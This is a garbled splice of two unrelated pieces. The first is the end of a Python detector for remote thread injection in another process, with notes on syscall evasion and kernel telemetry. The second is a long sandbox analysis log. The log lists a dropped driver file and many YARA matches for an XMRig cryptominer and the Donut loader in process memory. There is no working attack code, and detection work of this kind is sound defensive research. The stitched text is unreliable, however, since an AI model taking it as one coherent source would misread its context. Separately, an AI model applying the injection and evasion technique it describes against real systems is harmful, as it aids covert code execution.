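    """Flag a thread started in a foreign process on memory that the same caller
    allocated, wrote and made executable. Regions are matched by containment, so
    writes and thread starts at offsets inside the allocation still resolve."""
    owned: dict[tuple[int, int], list[Region]] = {}   # (pid, target handle) -> regions it allocated
    findings = []
    for c in calls:
        if c.handle == NT_CURRENT_PROCESS:
            continue   # local RWX + thread is noisy (JITs, packers); a foreign handle is the signal
        regions = owned.setdefault((c.pid, c.handle), [])
        if c.api == "NtAllocateVirtualMemory":
            regions.append(Region(c.addr, c.size, c.protect in EXECUTABLE_PROTECTIONS))
            continue
        region = next((r for r in regions if r.contains(c.addr)), None)
        if region is None:
            continue   # touching memory it did not allocate (e.g. patching a loaded module) is another technique
        if c.api == "NtWriteVirtualMemory":
            region.written = True
        elif c.api == "NtProtectVirtualMemory":
            region.executable = region.executable or c.protect in EXECUTABLE_PROTECTIONS
        elif c.api == "NtCreateThreadEx" and region.written and region.executable:
            findings.append(Finding(c.pid, c.handle, region.base, c.addr))
    return findings


if __name__ == "__main__":
    for f in detect_remote_injection(parse_trace(SAMPLE_TRACE)):
        print(f"pid {f.pid}: thread at {f.thread_start:#x} via handle {f.target_handle:#x}, "
              f"inside region {f.region_base:#x} that the same process allocated and wrote")
```

Because the allocation may already be PAGE_EXECUTE_READWRITE, the chain is accepted with or without the NtProtectVirtualMemory step, and the thread start is resolved to the allocation by containment so an entry point inside the mapped image still matches. One practical caveat: when these Nt* functions are reached through direct or indirect syscalls, user-mode API hooks never observe them, so the trace feeding this logic has to come from kernel-side telemetry (ETW threat-intelligence events, process and thread callbacks) rather than from a hooked ntdll.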
              Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
              Source: C:\Windows\System32\conhost.exe Code function: 1_2_000001575946E106
              Source: C:\Windows\System32\conhost.exe Code function: 1_2_000001575946E4D6
              Source: C:\Windows\System32\conhost.exe Code function: 1_2_000001575946E90E
              Source: C:\Windows\System32\conhost.exe Code function: 1_2_000001575946D4D2
              Source: C:\Windows\System32\conhost.exe Code function: 1_2_000001575946ED6A
              Source: C:\Windows\System32\conhost.exe Code function: 1_2_00007FFD9B8A5106
              Source: C:\Windows\System32\conhost.exe Code function: 1_2_00007FFD9B8A5EB2
              Source: C:\Windows\System32\conhost.exe Code function: 14_2_00000299653048D6
              Source: C:\Windows\System32\conhost.exe Code function: 14_2_0000029965304506
              Source: C:\Windows\System32\conhost.exe Code function: 14_2_000002996530516A
              Source: C:\Windows\System32\conhost.exe Code function: 14_2_0000029965304D0E
              Source: C:\Windows\System32\conhost.exe Code function: 14_2_00000299653038D2
              Source: C:\Windows\System32\conhost.exe Code function: 14_2_00007FFD9BAA4F52
              Source: C:\Windows\System32\conhost.exe Code function: 14_2_00007FFD9BAA41A6
              Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
